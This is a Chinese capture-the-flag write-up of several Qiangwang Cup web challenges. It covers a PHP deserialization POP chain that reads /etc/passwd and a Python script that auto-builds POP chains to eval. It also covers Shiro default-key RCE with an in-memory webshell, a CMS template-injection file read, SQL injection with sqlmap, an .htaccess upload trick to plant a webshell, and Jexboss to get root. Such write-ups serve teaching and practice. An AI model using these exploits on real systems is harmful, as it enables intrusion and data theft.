强网杯 部分WEB WP
Web
赌徒
随便好像就能读文件了,直接读/flag 。。。、
<?php
class Start
{
public $name;
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
//echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
$r1 = new Room;
$r1->filename = '/etc/passwd';
$r2 = new Room;
$r2->a = $r1;
$s = new Start;
$i = new Info;
$i->file['filename'] = $r2;
$s->name = $i;
print_r(urlencode(serialize($s))."\r\n");
unserialize(serialize($s));
pop_master
PHP_Parser生成AST存在a.json里
然后python写个脚本BFS找通路,用极其暴力的方法剪枝。。。
脚本如下
import json
import queue
ast = json.load(open('a.json','rb'))
classes = {}
for i in range(len(ast)):
classes[ast[i]['name']['name']] = ast[i]
f2cTable = {}
#ban_function = ['YkN508','frZNkk','N3R1ow','N3R1ow','CCO4GN','LCG9b8','ILnKZX']
ban_function = []
for pclass in ast:
for f in pclass["stmts"]:
if f['nodeType'] == "Stmt_ClassMethod":
f2cTable[f['name']['name']] = pclass['name']['name']
#print(f2cTable['GCLh2c'])
#print(classes_index)
#entrypoint_class =
#entrypoint_args = "cat /flag"
visit_function = {}
q = queue.SimpleQueue()
class State:
def __init__(self,curClassName,curFunctionName,father):
self.className = curClassName
self.functionName =curFunctionName
self.father = father
initState = State('MoAUb1',"HsGsAu",None)
def printTree(s:State):
ret = f"$my{s.className} = new {s.className};\r\n"
father = s.father
while father != None:
tmp = f"$my{father.className} = new {father.className};\r\n"
tmp += f"$my{father.className}->{classes[father.className]['stmts'][0]['props'][0]['name']['name']} = $my{s.className};\r\n"
s = father
father = father.father
ret +=tmp
print(ret)
q.put(initState)
while not q.empty():
curState = q.get()
if hasattr(visit_function,curState.className+curState.functionName):
continue
else:
visit_function[curState.className+curState.functionName] = True
if curState.functionName in ban_function:
continue
cur_fuction = ''
for f in classes[curState.className]["stmts"]:
if f['nodeType'] == "Stmt_ClassMethod":
if f['name']['name'] == curState.functionName:
cur_fuction = f
break
cur_param = cur_fuction['params'][0]['var']['name']
for stmt in cur_fuction['stmts']:
if stmt['nodeType'] == 'Stmt_Expression':
if stmt['expr']['nodeType'] == "Expr_Assign" and stmt['expr']['var']['name'] == cur_param:
print(stmt['expr']['var']['name'],cur_param)
break
elif stmt['expr']['nodeType'] == "Expr_Eval":
#print("yes")
printTree(curState)
exit(0)
elif stmt['expr']['nodeType'] == "Expr_MethodCall":
#print(curState.className,'->',f2cTable[next_f])
next_f = stmt['expr']['name']['name']
q.put(State(f2cTable[next_f],next_f,curState))
#printTree(curState)
#exit(0)
elif stmt['nodeType'] == 'Stmt_For':
flag = 0
for forstmt in stmt['stmts']:
if forstmt['nodeType'] == 'Stmt_Expression':
if forstmt['expr']["var"]["name"] == cur_param:
flag = 1
break
if flag==1:
break
elif stmt['nodeType'] == 'Stmt_If':
if stmt['cond']['nodeType'] == "Expr_FuncCall":
next_f = stmt['cond']['args'][1]['value']['value']
#print(curState.className,'->',f2cTable[next_f])
q.put(State(f2cTable[next_f],next_f,curState))
#exit(0)
自动生成POP链手动打
Hard_Penetration
首先进去是个登录页面,发现set-cookie:Rememerme=deleteMe
很明显shiro框架,尝试shiro反序列化打,需要找AES的密钥,一般为硬编码默认的密钥
密钥硬编码,直接RCE,注入冰蝎内存马后发现:
netstat看下,结合ports.conf发现在8005端口还开放web服务
内网代理出来发现是一个cms,并且存在后台,而且后台给出了是juhucms
而且该CMS直接可以遍历文件,发现其目录结构和baoCMS完全一致,下载源码进行审计发现在模板处理处:
和74cms的模板注入比较类似,继续向上看fetch的调用发现:
display调用了fetch,一般display也就是模板的渲染,因此我们需要找一个可以访问的路由,并且使得templateFile可控,全局搜索:
这些CommonAction都有该方法,但是有很多鉴权需要登录后台,而后台口令默认口令和弱口令貌似都进不去,发现在wap模块中:
这是可访问的路由,并且不需要鉴权,因此我们构造访问路由即可:
http://127.0.0.1:8005/wap/common/show?templateFile=/flag
EasyWeb
进入给了Hint说端口在30000-50000,扫端口发现:36842
一个登录页面,但是username存在注入,SQLMAP直接梭了,得到
admin 99f609527226e076d668668582ac4420
进去一顿试,题目说是easy_SSRF,结果后台有个/file能上传文件。。。
对文件内容和名字进行过滤,上传.htaccess
AddHandler php5-script aaa
然后上传一个aaa.aaa
传个马上去然后看下其他人操作和netstat
发现8006开了jboss,而且是root开的,flag是root才可读
直接用Jexboss梭了
不过我弹shell之后本地用,可以root但是无法执行命令,队友试了下可以
python3 .\jexboss.py -u http://127.0.0.1:8006
直接cat flag
寻宝
Part1 绕过如下
Part2 idm下载 全局搜索KEY2
import os
import docx
import base64
import binascii
import shutil
dir_path = "five_month"
for root,dirs,files in os.walk(dir_path):
for filename in files:
#print(file)
filepath = os.path.join(root, filename)
if filename.endswith(".docx"):
file = docx.Document(filepath)
fulltext = ''
for f in file.paragraphs:
fulltext += f.text
#print(fulltext)
try:
raw = fulltext.encode()
if b"KEY2" in raw:
with open(filename+".png","wb") as o:
o.write(raw)
except binascii.Error:
pass
if filename.endswith(".png"):
shutil.copy(filepath,filename)